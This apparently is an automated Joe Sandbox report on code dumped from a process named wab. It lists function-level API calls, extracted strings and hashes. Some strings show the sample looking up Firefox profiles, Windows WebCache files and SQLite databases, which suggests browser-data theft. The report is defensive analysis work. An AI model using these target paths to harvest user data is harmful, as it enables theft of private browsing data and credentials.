                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2941347001-0
                                                                                                                                                                                                                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                      • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 669240632-0
                                                                                                                                                                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                      • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                      • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                      • API String ID: 1821831730-2138825249
                                                                                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
